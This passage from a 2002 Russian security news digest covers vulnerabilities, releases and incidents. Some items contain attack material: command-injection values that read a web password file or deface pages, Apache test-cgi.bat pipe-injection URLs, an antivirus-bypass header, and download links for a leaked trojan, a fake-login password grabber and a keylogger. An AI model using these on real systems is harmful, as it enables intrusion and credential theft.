На прошлой неделе хакерами было взломано три веб-сайта компании Microsoft, причем, как утверждают взломщики, ими была использована широко известная уязвимость в веб-сервере Microsoft IIS, обнаруженная еще в июне 2001 года. В воскресенье хакерская группа из Бразилии, известная как Silver Lords, заменила главную страницу веб-сайта поддержки пользователей компании Microsoft на другую, с обращением к основателю Microsoft: "Билл Гейтс, мой обожаемый друг-миллионер". На странице хакеры с юмором говорят о том, как компания не следует собственным рекомендациям по части своевременного обновления программного обеспечения! Другие, взломанные хакерами сайты - это страница исследовательского центра Microsoft Social Computing Group, и страница, посвященная Microsoft Office. Как заявили бразильские хакеры, для взлома сайтов ими была использована уязвимость в одной из компонент веб-сервера Microsoft IIS FrontPage Server Extensions. Ошибка переполнения буфера была обнаружена компанией Microsoft еще летом прошлого года, патч был выпущен 21 июня 2001 года. Подробности - http://www.compulenta.ru/news/2002/3/26/27346/
26/03/2002 ICQ 2002a Beta - официальная версия интернет-пейджера.
Выпущена новая версия популярного интернет-пейджера ICQ 2002a Beta (Build 3722). Среди новых возможностей очередной версии интернет-пейджера: возможность поиска других пользователей по любому слову или фразе, кнопки поиска и добавления пользователей, определение и настройка установок при подключении к сети через брандмауэр, возможность настройки уникального звукового сопровождения каждому пользователю в контакт-листе, совместимость с Windows XP и возможность защиты от спама. Новые возможности защиты ICQ от спама представлены в виде возможности фильтровать входящие сообщения по ключевым словам. Данная возможность не столько избавляет от спама, сколько предоставляет возможности родителям для ограничения словарного запаса тех, кто общается с их детьми. Список запрещенных слов может быть отредактирован только после ввода пароля. Тестирование программы выявило улучшенную производительность данной версии - запуск утилиты и работа с ней происходят значительно быстрее, без задержек. Единственная, на текущее время, обнаруженная недоработка - это то, что иконка программы присутствует как в трее, так и в панели задач. Возможно, что "так и было предусмотрено", хотя и существуют некоторые сомнения по этому поводу. Скачать можно здесь - http://ftp.icq.com/pub/ICQ_Win95_98_NT4/ICQ2002a/icq2002a.exe
26/03/2002 Новый Билль американского Конгресса пытается регулировать развитие компьютерной техники и программного обеспечения.
Как указывает wired.com, на прошлой неделе сенатор от Южной Каролины Fritz Hollings представил Конгрессу новый Билль, связанный с защитой авторских прав. Также в его поддержку выступили конгрессмены: Ted Stevens (Аляска), Daniel Inouye (Гавайи), John Breaux (Луизиана), Dianne Feinstein (Калифорния). Билль предусматривает встраивание в различную аппаратуру (от MP3-плееров до стотовых телефонов, факсов, цифровых фотоаппаратов и персональных компьютеров) устройств, предотвращающих нелегальное копирование. Согласно этому Биллю, названному CBDTPA (Consumer Broadband and Digital Television Promotion Act) программисты и софтверные фирмы, выпускающие программное обеспечение обязаны включать в код своих продуктов схему защиты от копирования, одобренную федеральным правительством. CBDTPA относит сюда любую программу в исходных или объектных кодах, которая может быть запущена на PC или иных устройствах, имеющих микропроцессор. Сюда включаются не только Windows медиа-плееры и им подобные, как можно было бы предположить. Под CBDTPA подпадают: текстовые процессоры, редакторы электронных таблиц, операционные системы, компиляторы, языки программирования и даже такие UNIX-утилиты, как "cp" и "cat"! Как сказал Том Белл, профессор Чепменовского юридического университета и преподаватель закона об интеллектуальной собственности: " Под определение CBDTPA подпадают все, что может быть запущено на компьютере, за исключением, может быть, часов". Подробности о CBDTPA - http://www.wired.com/news/politics/0,1283,51274,00.html Мнения других людей о Билле - http://judiciary.senate.gov/special/input_form.cfm
26/03/2002 Многие WWW-сайты подвержены уязвимости типа Cross-site scripting (CSS).
В BUGTRAQ Berend-Jan Wever написал, что, согласно проведённым им исследованиям уязвимости WWW-сайтов на наличие уязвимости типа Cross-site scripting (CSS), многие известные сайты подвержены ей. Автор назвал следующие сервера: microsoft, altavista, google, cnet, time, ebay, amazon, netscape, yahoo, redhat. Автор утверждает, что этот список далеко не полон, и что он, потратив не больше получаса нашёл подобную уязвимость на почти всех сайтах. Технология проведения проверки не раскрывается. Berend-Jan Wever cвязался с контактными лицами компаний (кроме yahoo и ebay) и сейчас ожидает от них ответа. Напомним вкратце, что собой представляет уязвимость Cross-site scripting. Это "технология", которая позволяет при помощи специально построенного URL-запроса перенаправить броузер клиента на другой сайт, при этом: 1. Предоставляется доступ ко всей информации, к которой имеет доступ посетитель уязвимого CSS-сайта (адресная книга, персональная информация и т.д.) 2. Имеется возможность выполнения всех действий, которые может выполнить посетитель уязвимого CSS-сайта (изменение персональных настроек, изменение пароля, посылка сообщений). 3. Содержимое уязвимого CSS-сайта может быть спуффлено (подставлено) таким образом, что посетитель думает, что он находится на сайте www.foo.com, в то время, как он действительно находится на www.bar.com. Источник - http://www.securityfocus.com
25/03/2002 Релиз Apache 1.3.24.
Вышла новая версия популярного Вэб-сервера Apache. Анонс и описание - http://www.apache.org/dist/httpd/Announcement.html
25/03/2002 DivX5 for Linux.
На сервере divx.com появилась пятая версия популярного кодека DivX для Linux. Ccылка - http://www.divx.com
25/03/2002 Ещё один способ обхода антивируса NAV.
Как написал наш соотечественник из Нижнего Новгорода 3APA3A, существует ещё один (по его нумерации-13-й) способ обойти антивирус, фильтрубщий почту по её содержимому. В данном случае это связано с тем, что большинство MUA (Mail User Agent) игнорируют регистр букв в заголовках Content-Type, Content-Disposition, в то время, как антивирусы, фильрующие почту по её содержимому действуют иным способом. Как указывает автор, подобный "баг" (или уязвимость?) замечен только в NAV, и не проявляется в McAffee и KAV (AVP). Таким образом, сформировав почтовое сообщение с заголовком следующего вида: CONTENT-type: text/plain; NAme=\"eicar.com\", существует возможность обойти защиту NAV. Полный документ по методам и видам обхода антивирусных программ "Bypassing content filtering software" доступен здесь - http://www.security.nnov.ru/advisories/content.asp
25/03/2002 Конференция по компьютерной безопасности UniNet.
C 15 по 19 апреля 2002 UniNet проводит 1 конференцию по безопасности InfoSec 2002. Эта конференция позволит разработчикам секьюрити приложений, исследователям безопасности и просто заинтересованным лицам обмениваться информацией в непринуждённой атмосфере. UniNet-это академическая сеть, объединяющая людей, университеты и организации для объединения совместных знаний и обмена ими ( и ресурсами) в различных тематических областях. Самое примечательное в этой конференции, что можно принять в ней участие, не вставая со своего кресла-то есть она будет проводиться в сети. Для подключения к конференции достаточно подключиься при помощи IRC-клиента к серверу irc.uninet.edu и зайти на канал #infosec. С сайта UniNet можно подать заявку на своё участие через регистрационную форму. Довольно занятный факт был замечен в списке стран, которые предлагаются в регистрационной форме. Не была замечена Украина, как страна, зато есть маленькая Доминиканская республика (привожу просто, как забавный факт). Попутно хотелось бы заметить, что при отсутствии ИРЦ-клиента можно работать в IRC через Вэб-сервер chat.kuban.net. Cервер UniNet c подробностями - http://infosec.uninet.edu/
25/03/2002 Уязвимость в Service Pack Manager 2000.
Service Pack Manager 2000-программа, выпускаемая Gravity Storm Software. Эта программа помогает отслеживать и устанавливать централизованно на все машины сети хотфиксы и сервис-паки для ОС WinNT/2K. В описании сказано следующее:"You can remotely detect, track, monitor, and install Service Packs and Hotfixes on your network." Как указал в письме в BUGTRAQ некий 'ken'@FTU после установки по умолчанию эта программа создаёт скрытый разделяемый ресурс (hidden share) с названием SPM2000c$, который залинкован на диск C:\. Все критические директории при этом становятся читаемыми (readable) и в некоторых случаях (зависит от конфигурации ОС) записываемыми (writeable) удалённо. Для примера-директория C:\winnt\system32\repair может быть прочитана, а C:\winnt\system32 позволяет записывать в неё. Последствия этого достаточно очевидны. Компания выпустила новую версию своей программы. Service Pack Manager 2000 доступен - http://www.securitybastion.com/
25/03/2002 Интересная статья на linuxdevices.com.
Новая статья, представляющая собой сравнение preempt patch и low-latency patch для ядра Linux. Статья - http://www.linuxdevices.com/articles/AT8906594941.html
24/03/2002 Исходники и сам дистрибутив трояна используемого ФБР уркадены.
Скандально известная программа удаленного администрирования, мониторинга и перехвата информации D.I.R.T.™ (Data Interception by Remote Transmission) в течение последней недели вновь привлекла внимание общественности. Компания-разработчик, Codex Data Systems Inc, была взломана и злоумышленникам удалось украсть более 150 файлов, в числе которых сам дистрибутив и исходники этого Спец. трояна. Утечка информации нанесла серьезный урон и без того сомнительной репутации компании. Система D.I.R.T., согласно официальной политике CDS, предназначается для использования исключительно правоохранительными органами и имеет стоимость, в зависимости от конфигурации, от 2 до 200 тысяч долларов. Независимые же эксперты утверждают, что по функциональности система D.I.R.T. не намного превосходит широко известные бесплатные хакерские программы Back Orifice и SubSeven. Ведущий разработчик D.I.R.T., Эрик Шнайдер (Eric Schneider), ушел из компании в 1999 году по этическим причинам. По его словам, он разрабатывал D.I.R.T. для того, чтобы помочь полиции в борьбе с педофилией, но CDS продавала его иностранным разведкам. Интересен тот факт, что, по заявлению Шнайдера, D.I.R.T. не является таким всемогущим продуктом, каким его преподносит руководство CDS, и некоторые из рекламируемых возможностей просто не существуют. D.I.R.T. также имеет очень интересную возможность - умение обходить межсетевые экраны (фаерволлы).Обход защиты достигается за счет использования технологии AntiSec™. Предназначается AntiSec для поиска всех известных межсетевых экранов и их незаметной нейтрализации. В любом случае, все это стало публичным и без труда можно скачать... Источник: http://www.bezpeka.com/library/adm/dirt.html Скачать дистрибутивы DIRT можно здесь: http://cryptome.org/dirty-war.zip http://cryptome.org/moredirt.zip Или здесь: ftp.uinc.ru/uinc/win/spy/Other Spy Things/DIRT
24/03/2002 Сомнительная политика безопасности в Outlook 2002.
Было обнаружено несколько недостатков в безопаности системы этого почтового клиента: 1) Обьекты загружаемые через IFRAME тег скачиваются и выполняются. Во время прочтения письма, появляется диалоговое окно с вопросом, желает ли пользователь спасти данный файл на диск или запустить его. Никаких предупреждений о том, что файл может быть зараженным не появляется. Более того, кнопка выделенная по "дефолту" - "открыть", то есть, невнимательный пользователь даже не заметит как его компьютер будет заражен. 2) Не смотря на то, что javaScript запрещен на выполнение по умолчанию, он все равно запускается, если использовать его после "about:" или "javascript:" в теге <a href=>. 3) Не смотря на те же установки безопасности по умолчанию, кукиесы можно легко писать и читать. 4) Дополнительные проблеммы присутствуют в обработке .URL файлов (файл ссылки на странички). Источник: http://www.securityfocus.com
24/03/2002 По Сети распространяется новая модификация червя MyLife!.
"Лаборатория Касперского" сообщает о том, что в интернете размножается достаточно опасный червь I-Worm.MyLife.b, являющийся модификацией недавно обнаруженного червя MyLife. MyLife.b распространяется через интернет в виде файлов, прикрепленных к зараженным письмам. Червь является приложением Windows (PE EXE-файл), имеет размер около 11K (упакован UPX, размер распакованного файла - около 32K) и, как его "старший братан", написан на Visual Basic. Источник - http://www.compulenta.ru/news/2002/3/22/27190/
23/03/2002 Старая идея, оригинальная реализация: DummyLock, v2.0.
Программа предназначается для восстановления паролей для winXP, win2k, win2k advanced server и winNT машин. Есть несколько логин окон из которых вы выбираете такой, какой отображается при запуске вашей системы, заполняете дополнительные настройки и оставляете систему с этим фальшивым окном. Как только кто-то подходит к этой машине, набирает свой пароль и логин - он входит в систему и его пароль записывается. Чтобы просмотреть последний введенный логин и пароль необходимо повторно запустить программу. Скачать программу можно здесь: http://www.astalavista.com/tools/password/wincrackers/dummylockv2.zip
22/03/2002 Вышел KDE 3.0-RC3 .
После двух негласных пре-релизов, вышел последний пререлиз KDE-3.0, окончательный выход которого намечен на начало апреля. Пакеты дистрибуторов и исходники уже вовсю лежат на зеркалах, и предлагаются для жестокого финального тестирования публикой. Подробности - http://dot.kde.org/1016696443/
22/03/2002 Outlook2002 по прежнему выполняет JavaScript.
Как указывает в BUGTRAQ Richard M. Smith, несмотря на то, что в Outlook2002 отключена возможность запускать JavaScript, эта возможность всё равно имеется. Уязвимость связана на этот раз с Windows Media Player (WMP). WMP позволяет обойти установки Outlook и запустить JavaScript, Java, и ActiveX код, который содержится в HTML-сообщении электронной почты. Автор предлагает следующий сценарий: 1. Создать IFRAME в почтовом сообщении, который указывает на Windows Media Skin (.WMS) файл. Этот файл может быть загружен как через Web, так и из приаттаченного файла, используя CID: протокол. 2.Так как .WMS-файлы считаются безопасными Outlook, он заппустит WMP для загрузки этого файла. 3..WMS-файл содержит JavaScript-код, запускающий Web-страницу, используя метод player.LauchURL(). Переключатель onload автоматически выполнится, когда WMP откроет .WMS-файл. 4.Шаг 3 может быть выполнен из присоединённого к письму .WMS-файла, если он содержит "about:" или "javascript:" протокол. Подобным образом могут использоваться также файлы .WMZ, .WMD, и .WMA. Outlook Express и более ранние версии Outlook также содержат эту уязвимость даже при максимально установленной защите. Источник - http://www.securityfocus.com
22/03/2002 Уязвимость в Penguin Traceroute.
Penguin Traceroute - это Перл-скрипт, позволяющий выполнять команду traceroute c Web-сервера. Автор этого скрипта не реализовал в нём проверку входных данных на наличие в запросе символов ";" и "|". Таким образом, можно сформировать в поле адреса запрос вида "127.0.0.1;cat /www/secure/.htpasswd" и получить файл паролей для Web-сервера, или изменить страницу Web-сервера ("127.0.0.1;echo I iz 1337>index.html"), если пользователь apache имеет права на запись в директорию. Источник - www.securityfreaks.com
22/03/2002 Обновление библиотеки imlib для RedHat.
Как указывается в бюллетене по безопасности RedHat, в библиотеке imlib, которая предназначена для различных программ, работающих с изображениями, существует уязвимость, которая позволяет злоумышленнику, сконструировавшему специальный image-файл, сбросить программу просмотра изображения, использующую библиотеку imlib или даже выполнить определённый код на удалённой системе. Всем пользователям RadHat версий 6.2, 7.0-7.2 рекомендуется обновить библиотеку до версии 1.9.13-2.6. Подробности - http://bugzilla.redhat.com/bugzilla
22/03/2002 Возможность удалённого выполнения команд в Apache for Windows.
В версии Apache for Win32 (тестировались релизы 1.3.23 и 2.0.28-BETA) существует возможность удалённого выполнения команд сервера. Эти дистрибутивы содержат пакетный (batch) файл /cgi-bin/test-cgi.bat и в сервере предусмотрена возможность выполнения .bat и .cmd -скриптов. При запросе DOS batch-файла формируется запрос к Вэб-серверу, в результате которого вызывается командный интерпретатор (cmd.exe по умолчанию). Однако вводимые со скриптом параметры не анализируются программой. Подобная "особенность" позволяет в поле параметров передать символ "|" (конвейер в терминологии UNIX) и выполнить помимо .bat-файла произвольные команды. Например, после выполнения запроса http://TARGET/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf содержимое файла конфигурации Вэб-сервера (httpd.conf) будет доступно любому посетителю Вэб-сайта. Запрос http://TARGET/cgi-bin/test-cgi.bat?|echo+Foobar+>>+..\htdocs\index.html поместит слово "Foobar" на входную страницу Вэб-сервера. Запрос http://TARGET/cgi-bin/test-cgi.bat?|dir+c:+>..\htdocs\dir.txt выведет в файл dir.txt полное содержимое диска С. Пользователям Apache for Win32 рекомендуют обновить свой Вэб-сервер до версии 1.3.24 или 2.0.34-beta (крайние версии продуктов, но бета пока не выпущена). Обновлённые версии Apache - http://www.apache.org/dist/httpd/
22/03/2002 Очень полезный инструмент для системных администраторов (и не только) - программа "Give Me Too" (OS: 95/98/NT/2000/XP, Freeware).
Программа анализирует сетевой трафик, перехватывает данные (файлы) передаваемые по протоколу HTTP и сохраняет их на диск. Поддерживается фильтрация по URL, по размеру файлов, по IP адресам, по HTTP методам. От пользователя требуется только выбрать сетевой интерфейс и порт HTTP proxy или web сервера. Сайт программы: http://gmt.narod.ru
22/03/2002 Уязвимость в XDMCP.
ProCheckUp Ltd. обнаружила и опубликовала уязвимость в конфигурации по умолчанию протокола XDMCP (X Display Manager Control Protocol). В установках по умолчанию выставлен режим доступа в файле Xacces для программы chooser (графический логин-экран с возможностью ввода имени пользователя и пароля) как * CHOOSER BROADCAST, что позволяет любому хосту с установленным Х-сервером получить экран логина. Данной уязвимости подвержены операционные системы (дистрибутивы Linux) -Linux Mandrake versions 8.0, Solaris 2.6 (intel), Solaris 2.6 Sparc, Solaris 7 Sparc. Предполагается, что Solaris 8 тоже подвержен этой уязвимости, но пока он не тестировался. Более того, в Mandrake Linux kdm (менеджер экрана из KDE) выводит в виде иконок имена пользователей, которые заведены в системе и поддерживает вход через kdm пользователя root, Solaris этого не позволяет. Для получения удалённого доступа к экрану логина можно ввести команду вида: "X :2 -query IPADDRESS". Авторы уязвимости рекомендуют следующие шаги (что было продублировано в сегодняшнем бюллетене по безопасности Mandrake Soft) для Mandrake: 1. Редактировать файл /etc/X11/xdm/Xacces, где закомментировать строки "* #any host can get a login window" и "* CHOOSER BROADCAST #any indirect host can get a chooser". Для Solaris: редактировать аналогичным образом файл /etc/dt/config/Xaccess или /usr/dt/config/Xaccess. В примечании сказано, что компания Caldera объявила, что её дистрибутив Linux также уязвим и выпустила свой бюллетень по безопасности. CERT Присвоил этой уязвимости индекс VU#634847. Подробности - http://www.procheckup.com/security_info/vuln_pr0208.html
21/03/2002 Закрылась служба борьбы со спамом Open Relay Blocking Zone.
Ян Гулливер, администратор службы борьбы со спамом ORBZ (Open Relay Blocking Zone), разослал всем пользователям системы сообщение о прекращении работы системы, в результате трений с законом. В августе прошлого года Гулливер отправил сообщение в рассылку BugTraq, в которой сообщил о том, что сканнер ORBZ, осуществляющий фильтрацию сообщений, имеет возможность создания письма, которое, будучи отправленным на сервер под управлением Lotus Domino, вызывает сбой в работе. Данная уязвимость ПО Lotus Domino была исправлена разработчиками в версии R5.0.9, однако, как сообщает Гулливер, неизвестное пока лицо подало иск в суд штата Мичиган, обвиняя администратора в намеренном проведении DoS-атак на почтовые серверы. Гулливер сообщает пользователям, что сайт ORBZ будет удален, а система фильтрации e-mail - деактивирована, так как администратор сайта опасается возможного тюремного заключения, если суд не решится в его пользу. Источник - http://www.theregister.co.uk
21/03/2002 Злоумышленники обманом заставляют пользователей устанавливать себе троянов.
Координационный центр американской правительственной организации CERT, занимающейся проблемами информационной безопасности, объявляет о том, что неизвестные злоумышленники активно используют каналы IRC и интернет-пейджеров для организации распределенных DoS-атак. Как сообщают в CERT, в данном случае имеет место чистейшая "социотехника" - пользователей сети обманом заставляют устанавливать на свой компьютер вредоносные программы, и только от степени доверчивости потенциальной жертвы зависит, насколько успешной будет попытка произвести атаку. Пользователи IRC и интернет-пейджеров (ICQ, Instant Messenger и т.п.) получают автоматически сгенерированные сообщения, в которых предлагается скачать с определенного адреса антивирусное ПО, менеджеры закачек или, например, порнографию. Естественно, вместо вожделенного софта на компьютер жертвы попадают троянские и backdoor-программы. Если пользователь имеет неосторожность запустить свежескаченную программу, его компьютер оказывается доступным для злоумышленника, и тот может удаленно управлять компьютером: в частности, удалять и изменять файлы, воровать персональные данные, и, естественно, устанавливать в систему любые другие программы. Захваченная система может стать "стартовой площадкой" для проведения распределенных DoS-атак. Подробности - http://www.compulenta.ru/news/2002/3/21/27105/
21/03/2002 Хакерам удалось на время похитить несколько тысяч доменов, находящихся в ведении Verisign.
Как сообщает интернет-издание Newsbytes, во вторник неизвестным хакерам удалось произвести крупномасштабную подмену заглавных страниц сайтов, доменные имена которых были зарегистрированы компанией Verisign. Инцидент затронул несколько тысяч доменов, зарегистрированных Verisign Network Solutions и принадлежащих сайтам, находящимся в стадии разработки. В результате взлома каждый пользователь Сети, набравший один из таких адресов, попадал на страницу, где на черном фоне была помещена картинка с разрезанной на куски тряпичной куклой и надписью: "Did Web Pirates domain your domain?" Такой текст заставил заподозрить во взломе довольно известную бразильскую хакерскую группу Web Pirates, однако один из ее участников, скрывающийся за псевдонимом Splash, заявил, что узнал о взломе из сообщений рассерженных владельцев доменов в своем почтовом ящике. По данным Newsbytes хакерам удалось взломать один из серверов компании Interland, предоставляющей Verisign услуги по принципу аутсорсинга. Если верить баннеру, размещенному на этом сервере, то он работает под управлением ПО Microsoft Internet Information Server на платформе Windows 2000. По словам сотрудников Interland, взлом был обнаружен достаточно оперативно, а его последствия были полностью ликвидированы в тот же день. Источник - http://www.newsbytes.com/
21/03/2002 Компания Microsoft выпустила новую бета-версию Visual J# .Net.
Компания Microsoft выпустила вторую бета-версию пакета Visual J# .Net, позволяющего создавать программное обеспечение на языке Java, которое будет работать только в среде Microsoft .Net. Пакет не дает возможности создавать независимые от платформ Java-приложения. .Net - это технология фирмы Microsoft, предназначенная для предоставления разнообразных услуг через интернет. Она позволяет получать доступ к размещенному в интернете программному обеспечению при помощи самых разнообразных устройств: персональных компьютеров, мобильных телефонов и КПК. Технология .NET также обеспечивает взаимодействие серверов друг с другом, к примеру, для оплаты услуги кредитной картой, либо для поиска автомобильных заправок по индексу населенного пункта. Как известно, компания Sun подняла вопрос о Visual J# .Net в своем отдельном антимонопольном иске против компании Microsoft. По мнению представителей Sun, Microsoft использует испорченный вариант языка Java, утративший свое главное достоинство - кроссплатформенность, которая позволяла запускать написанные на этом языке программы на устройствах, работающих под управлением любой оперативной системы. Впрочем, как утверждает представитель Microsoft Тони Гудью, иск, поданный фирмой Sun, абсолютно не повлияет на планы по выпуску пакета Visual J# .Net, поскольку в нем отсутствует интеллектуальная собственность компании Sun. По словам Гудью, выход окончательной версии Visual J# .Net запланирован на середину текущего года. Бета версия Visual J# .Net - http://msdn.microsoft.com/visualj/jsharp/beta.asp
21/03/2002 Новая версия: SpyClock v2.0.
Во-первых, программа предназначена для защиты от несанкционированного доступа к компьютеру под управлением операционной системы семейства Windows. Для этого в программе есть функции блокировки компьютера (это очень удобно, если Вам надо ненадолго отойти от компьютера, а на нем есть информация, которой Вы бы не хотели лишиться.); функции шпионов за клавиатурой (вы сможете увидеть все, что было введено с клавиатуры); функции слежения за вводимыми адресами в Internet Explorer (Вы сможете узнать какие сайты посещались.). Вторая функция программы позволяет управлять процессами в памяти и определять ее свободный объем. Сама программа представлена в виде электронных часов, которые Вы можете расположить в любой части рабочего стола Windows. Скачать новую версию: http://www.uinc.ru/scripts/load.cgi?files/rook/spycl2.zip
20/03/2002 Вышел Code Forge 2.5 RUS.
Вышла новая версия IDE (интегрированная среда разработки) для *nix, которая многими считается лучшей. Доступны Английская и Русская версии. Изменений очень много, но самое главное что теперь в Code Forge есть Навигатор Классов, позволяющий легко разобраться даже в сложном проекте. Также добавлена поддержка BitKeeper'a и SourceSafe. Более подробно - http://www.codeforge.com/rus
20/03/2002 Как отключить шпионскую программу в файлообменном клиенте Morpheus.
В дополнение к предыдущей новости, приведём инструкции по отключению Wurld Media BHO-расширения броузера, которое исталлируется вместе с Morpheus, описаннные Microsoft и любезно переведённые Compulenta. Как написано в рекомендациях Microsoft, чтобы отключить в IE опции Tool Bands и Browser Helper Objects, необходимо: 1. В браузере выбрать Tools/Internet Options (Настройки Интернет) 2. Выбрать закладку Advanced. 3. Отключить в разделе Browsing опцию "Enable third-party browser extensions". 4. Перезапустить браузер. Таким образом пользователь блокирует возможность работы посторонних расширений браузера, и Wurld Media BHO его больше не побеспокоит. Инструкции в оригинале - http://support.microsoft.com/default.aspx?scid=kb;EN-US;q298931
20/03/2002 Вместе с новым клиентом Morpheus в систему устанавливается троян.
Как заявил представитель компании StreamCast в интервью новостному сайту CNet, в поставку новой версии клиента для пиринговых сетей Morpheus PE встроен специальный плагин, который незаметно для пользователя отслеживает его поведение в интернете, контролируя работу веб-браузера. Плагин для браузера сравнивает адреса веб-сайтов, вводимые пользователям, с собственной базой данных. При совпадении адреса, пользователю, перед загрузкой необходимого ему сайта, загружается другой сайт аналогичной тематики. Как заявляют в компании StreamCast, плагин не собирает личную информацию о пользователе. В настоящее время проводится тестирование службы, и уже через месяц начнется ее полноценное использование. Источник - http://www.cnet.com
20/03/2002 Microsoft выпускает очередной патч для всей линейки ОС Windows.
4 марта компания Microsoft выпустила патч, решающий проблему с обнаруженными уязвимостями в Microsoft Virtual Machine. Две недели спустя, 18 марта, компания Microsoft выпустила очередное обновление Microsoft VM, сообщив об обнаружении еще нескольких уязвимостей в виртуальной машине. Обновления выпущены для всей линейки 32-разрядных операционных систем Windows (Windows 9x, NT, 2000, XP). Данный патч обновляет Microsoft Virtual Machine до версии Build 3805. Одна из уязвимостей, обнаруженных уже после выпуска патча 4 марта, позволяет с помощью специально созданного Java-апплета перенаправлять пользователя на сайт, отличный от запрашиваемого. Данная уязвимость позволяет получать информацию о деятельности пользователя в сети, а также без его ведома получать личную информацию, такую как номера кредитных карт и др. Вторая уязвимость позволяет запускать программный код на удаленной машине без ведома пользователя. Чтобы воспользоваться дырами, злоумышленнику необходимо создать специальный Java-апплет и разместить его в сети. Более подробно - http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS02-013.asp
20/03/2002 Возможность определения ОС Linux c ядром 2.4.* по содержимому UDP, ICMP-пакетов.
Как указывает в BUGTRAQ Ofir Arkin (ofir@atstake.com) cуществует возможность определения Linux-машин с ярами 2.4.*, анализируя приходящие с них UDP и ICMP-пакеты. В примере, приведённом автором, приведён анализ ответа на запрос nslookup (DNS-запрос, порт 53/UDP) и эхо-ответа на ping. В обоих случаях в поле IP ID приходящих с машины ответов равно 0, и не изменяется при посылке различных пакетов. Данная особенность может быть применена в технологии OS fingerprints для определения операционной системы на удалённой машине, которая используется многими популярными сканерами (queso, nmap). Ядра серии 2.2 подобной "особенностью не обладают. Ссылка - http://www.sys-security.com/archive/bugtraq/ofirarkin2001-03.txt
20/03/2002 AOL не несет ответственности за незаконное распространение электронных книг через свои серверы Usenet.
Федеральный судья Флоренс-Мари Купер вынесла на прошедшей неделе чрезвычайно важное для многих фирм, оказывающих онлайновые услуги, решение: суд постановил, что компания America Online не несет ответственности за незаконное размещение защищенных авторским правом электронных книг на принадлежащих ей серверах. Подробности - http://www.compulenta.ru/news/2002/3/19/26940/
20/03/2002 ЦРУ следило за посетителями своего веб-сайта.
Как заявила некоммерческая организация Public Information Research, на сайте Центрального разведовательного управления США проводится слежка за посетителями, что противоречит федеральным законам о приватности и собственным правилам ЦРУ. Постыдный факт был обнаружен на сайте CIA Electronic Reading Room, на котором посетители могут ознакомиться с документами, касающимися деятельности ЦРУ. Источник - http://www.compulenta.ru/news/2002/3/19/26998/
19/03/2002 Linux 2.5.7 - Новый релиз экспериментального ядра.
Вчера Линус выпустил 2.5.7 версию экспериментального ядра. Также в письме он написал, что уйдет в 2-х недельный отпуск и не будет читать почту в течении этого времени и попросил обсуждать проблемы на linux-kernel c Dave Jones, Jeff Garzik и др. пока его не будет это время. Подробности и CHANGELOG - http://linuxtoday.com/news_story.php3?ltsn=2002-03-19-005-26-PS
19/03/2002 Вышел Linux Mandrake 8.2.
Вчера вышел очередной релиз этого популярного дистрибутива. Основные системные компоненты включают в себя: * Ядро 2.4.18 * Улучшенную поддержку Firewire * Поддержку USB2, ECC memory, i830 DRM, ATA133, Geforce3 * Теперь XFree86 4.2 поддерживает 3D акселерацию для многих видео-карт, ранее поддерживаемых только в 3.3.6 * Glibc 2.2.4 Из программного обеспечения: * Apache 1.3.23 * PHP 4.1.2 * MySQL 3.23.47 * PostgreSQL 7.2 * Sendmail 8.12.1 * Postfix 20010228 * Staroffice 6.0 * Evolution 1.02 * KDE 2.2.2 (также включен KDE 3.0 RC2 для яростных поклонников всего нового) и GNOME 1.4.1 -- самые последние версии десктоп сред. KDE 2.2.2 включает в себя новую систему печати, интегрированную в PrinterDrake. Подробности - http://www.mandrakesoft.com/company/press/pr?n=/pr/products/2005&lg=en
19/03/2002 Уязвимость в Java(TM) Runtime Environment Bytecode Verifier.
Вслед за бюллетенем Sun Security Bulletin #00217 был выпущен бюллетень с номером #00218, в которм Sun указывает на серьёзную уязвимость в верификаторе (проверочном модуле) байт-кода Java(TM) Runtime Environment. Эта уязвимость позволяет "плохому" апплету запуститься и расширить полномочия в системе. Уязвимости подвержены: Netscape 6.2.1, поскольку в составе его уязвимые версии JRE и Microsoft VM (виртуальная машина) вплоть до билда 3802. Приводится длинный список уязвимых SDK, JDK c JRE. Windows Production Releases: SDK and JRE 1.3.1_01a, SDK and JRE 1.2.2_010, JDK and JRE 1.1.8_008. Solaris(TM) Operating Environment (OE) Reference Releases: SDK and JRE 1.2.2_010, JDK and JRE 1.1.8_008. Solaris OE Production Releases: SDK and JRE 1.3.1_01, SDK and JRE 1.2.2_10, JDK and JRE 1.1.8_14. Linux Production Releases: SDK and JRE 1.3.1_01, SDK and JRE 1.2.2_010. Sun рекомендует обновить все версии продуктов. Sun Security Bulletin - http://sunsolve.sun.com/security
19/03/2002 Уязвимость в приложении Java Web Start.
В Java Web Start cуществует уязвимость, позволяющая, при её использовании получить доступ к нежелательным системным ресурсам, как указано в бюллетене по безопасности Sun Security Bulletin #00217, выпущенном 18 марта. Уязвимыми являются релизы Java Web Start 1.0.1_01, 1.0.1, и 1.0. Пользователям рекомендуют обновить Java Web Start до версии 1.0.1_02 или обновить Java 2 SDK, Standard Edition, v 1.4. Java Web Start v.1.0.1_02 - http://java.sun.com/products/javawebstart/index.html Java 2 SDK, v 1.4 - http://java.sun.com/j2se/1.4/
19/03/2002 FreeBSD тоже обновляет библиотеку zlib.
В вышедшем вчера бюллетене по безопасности от FreeBSD утверждается, что эта ОС также подвержена уязвимости, названной "double-free zlib" (двойное освобождение памяти библиотекой сжатия zlib), хотя ранее утверждалось, что FreeBSD не присутствует эта уязвимость. В отличии от уязвимости в Linux, Solaris, попытка двойного освобождения динамической памяти (malloc, free) вызывает завершение задачи в случае использования флага 'A' при вызове malloc. Для проверки предлагается проверить наличие файла /etc/malloc.conf и переменной среды $MALLOC_OPTIONS и если они существуют убрать флаг "А". Кроме того, рекомендуют следующие шаги: 1. Проапгрейдить систему до 4.5-STABLE или RELENG_4_4, RELENG_4_5 с датой исправления позже 23.02. 2. Применить патч, ссылка на который приведена ниже: feed URL; cd /usr/src; patch -p < /path/to/patch; cd lib/libz; make depend && make all install. 3. Пересобрать по новой ядро и перезапустить систему. Кроме того, указывается, что многие порты, которые имеют статически слинкованную библиотеку libz, также могут содержать баг и не могут быть исправлены обновлением этой библиотеки. Бюллетень имеет номер-FreeBSD-SA-02:18. Заплатка для zlib - ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-02:18/zlib.patch
19/03/2002 Уязвимость в PHP Net Toolpack.
